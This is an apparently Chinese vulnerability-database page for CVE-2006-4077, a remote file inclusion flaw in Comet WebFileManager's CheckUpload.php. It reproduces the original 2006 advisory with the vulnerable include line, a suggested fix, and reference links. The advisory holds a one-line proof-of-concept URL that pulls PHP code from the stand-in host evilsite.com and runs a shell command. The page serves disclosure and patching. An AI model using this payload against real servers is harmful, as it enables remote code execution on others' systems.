Comet WebFileManager' CheckUpload.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110774 漏洞类型 输入验证
发布时间 2006-08-08 更新时间 2006-08-14
CVE编号 CVE-2006-4077 CNNVD-ID CNNVD-200608-181
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2151
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-181
|漏洞详情
CometWebFileManager是一种基于Web的远程文件交换管理程序。CometWebFileManager处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。CometWebFileManager的CheckUpload.php脚本没有正确验证Language参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。
|漏洞EXP
+--------------------------------------------------------------------
+
+ Cwfm-0.9.1 (Language) Remote File Inclusion
+
+ Original advisory:
+
+ http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: Cwfm 0.9.1
+ Venedor ...........: http://cwfm.sourceforge.net/
+ Class .............: Remote File Inclusion in /CheckUpload.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+                      http://www.bb-pcsecurity.de
+
+--------------------------------------------------------------------
+
+ Code /CheckUpload.php
+
+ .....
+ session_start();
+ include_once("Global.php");
+ //include_once("lang/$Language.php");
+ include_once("$Language.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $Language is not properly sanitized before being used.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $Language before using, include config-file or
+ denie direct access to the vuln file.
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Note:
+ Venedor contacted, but no response. So do a dirty patch.
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-08]
|参考资料

来源:BID
名称:19433
链接:http://www.securityfocus.com/bid/19433
来源:VUPEN
名称:ADV-2006-3221
链接:http://www.frsirt.com/english/advisories/2006/3221
来源:MISC
链接:http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_%28Language%29_Remote_File_Inclusion.htm
来源:SECUNIA
名称:21432
链接:http://secunia.com/advisories/21432
来源:XF
名称:comet-checkupload-file-include(28292)
链接:http://xforce.iss.net/xforce/xfdb/28292
来源:BUGTRAQ
名称:20060808Cwfm<=0.9.1(Language)RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/442714/100/0/threaded